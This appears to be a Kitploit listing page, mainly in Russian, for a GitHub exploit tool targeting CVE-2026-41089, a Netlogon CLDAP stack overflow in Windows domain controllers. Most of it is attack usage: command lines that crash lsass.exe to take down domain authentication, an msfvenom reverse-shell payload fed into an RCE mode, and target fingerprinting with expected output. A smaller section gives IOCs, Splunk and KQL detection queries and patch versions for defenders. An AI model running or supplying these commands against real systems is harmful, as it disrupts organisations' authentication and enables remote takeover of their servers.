Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41089 — CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。 | Kitploit
Инструменты/GitHubGitHub/hnytgl/cve-2026-41089
Vulnerability AnalysisExploitationPenetration TestingRemote Access ToolBinary Exploitation
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。

Репозиторий
14121 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-41089 — Эксплойт RCE через переполнение стека в CLDAP Netlogon для Windows

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Критический)
CWE: CWE-121 (Стековое переполнение буфера)
Вектор атаки: UDP/389 (CLDAP SearchRequest)
Воздействие: Удалённое выполнение кода (RCE) / Отказ в обслуживании (DoS)
Затронутые версии: Windows Server 2012 R2 ~ 2025 (контроллеры домена)
Патч: Кумулятивное обновление мая 2026 года

Обзор уязвимости

Функция NetpLogonPutUnicodeString в netlogon.dll содержит уязвимость переполнения стека при обработке запросов поиска CLDAP. Функция получает бюджет длины в байтах, но интерпретирует его как количество WCHAR, что приводит к записи в 2 раза больше ожидаемого.

Переполнение происходит в фиксированном стековом буфере размером 528 байт (264 ushort) функции NlGetLocalPingResponse. Управляемое атакующим поле User вместе с собственным DNS-именем сервера заполняют этот буфер, в конечном итоге перезаписывая GS-куки, что вызывает __report_gsfailure и аварию lsass.exe.

Условия срабатывания

  • В CLDAP SearchRequest NtVer=0x02 (принудительное использование старого, уязвимого пути BuildSamLogonResponse)
  • Длина поля User ≥ ~130 символов (бинарный лимит ~260 байт UTF-16)
  • Длина DNS-имени сервера ≥ ~80 символов (чем длиннее домен, тем легче достичь куки)

Внимание: NtVer=0x16 (значение, используемое многими публичными скриптами обнаружения) активирует безопасный путь BuildSamLogonResponseEx, не вызывающий уязвимость.

Функции

РежимОписание

Режим DoS

Один пакет приводит к аварии lsass.exe, из-за чего контроллер домена перезагружается в течение ~30-60 секунд. В течение этого времени вся доменная аутентификация через данный DC будет невозможна.

root@kitploit:~
# Базовое использование — отправка 3 пакетов
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Быстрая атака одним пакетом
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Агрессивный режим — 5 одновременных пакетов
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

Режим RCE

⚠️ Исследовательский уровень — ненадёжен и нестабилен в реальных условиях.

Проблемы RCE:

  1. Данные переполнения — это собственное DNS-имя сервера, а не shellcode атакующего
  2. GS Cookie необходимо обойти (требуется примитив утечки информации или брутфорс)
  3. CET/ACG/CFG на Server 2022+ усложняют традиционный ROP
root@kitploit:~
# Генерация shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# Отправка цепочки RCE
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Режим сканирования

root@kitploit:~
# Снятие отпечатков целевого DC
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Пример ожидаемого вывода (запатченная цель):

root@kitploit:~
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Пример ожидаемого вывода (незапатченная цель):

root@kitploit:~
NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Если NtVer=0x02 даёт таймаут, а остальные версии отвечают нормально, то цель, скорее всего, уязвима.

Расширенные параметры

Настройка тестовой среды

root@kitploit:~
# Создание DC с длинным доменом на Windows Server (незапатченном):
# 1. Повышение до контроллера домена (имя DNS с очень длинным доменом, например "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. Убедитесь, что установлен патч до мая 2026 года.
# 3. Запустите из атакующей машины:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. Наблюдайте аварию и перезагрузку DC

Индикаторы компрометации (IOCs)

Сеть

  • CLDAP SearchRequest на UDP/389 с User > 100 байт и NtVer = 0x02
  • Аномальный CLDAP-трафик от узла, не являющегося контроллером домена, к DC

Хост

root@kitploit:~
Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Правила обнаружения

root@kitploit:~
index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
root@kitploit:~
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Информация о патче

Юридическое заявление

Данный инструмент предназначен только для авторизованной оценки безопасности, пен-теста, соревнований CTF и оборонительных исследований. Использование в любой системе без явного письменного разрешения является незаконным. Ответственность за любые последствия несёт пользователь.

Ссылки

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
Скачать инструмент
--mode dos
Отправляет специально сформированный пакет CLDAP, вызывающий аварию LSASS и перезагрузку DC (~60 секунд прерывания аутентификации)
--mode rceПопытка удалённого выполнения кода (исследовательский уровень, требуется shellcode)
--mode scanСканирование ответов с разными значениями NtVer, снятие отпечатков целевого DC
--mode autoАвтоматическое обнаружение и выбор наилучшей стратегии атаки
ПараметрОписаниеЗначение по умолчанию
-l, --user-lenДлина поля имени пользователя (количество ASCII символов)180
--ntverЗначение NtVer (шестнадцатеричное, напр. 0x02)0x02
--countКоличество отправляемых DoS-пакетов3
--delayЗадержка между пакетами (сек)0.5
-t, --timeoutТаймаут сокета (сек)5.0
--jsonВывод результатов в формате JSON—
--rawПечать сырого дампа пакета перед отправкой—
--quietПодавление вывода баннера—
--shellcode-fileФайл пользовательского shellcode (сырой x64)—
--lhostАдрес для обратного шелла—
--lportПорт для обратного шелла4444
Версия Windows ServerНомер патчаПримечания
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772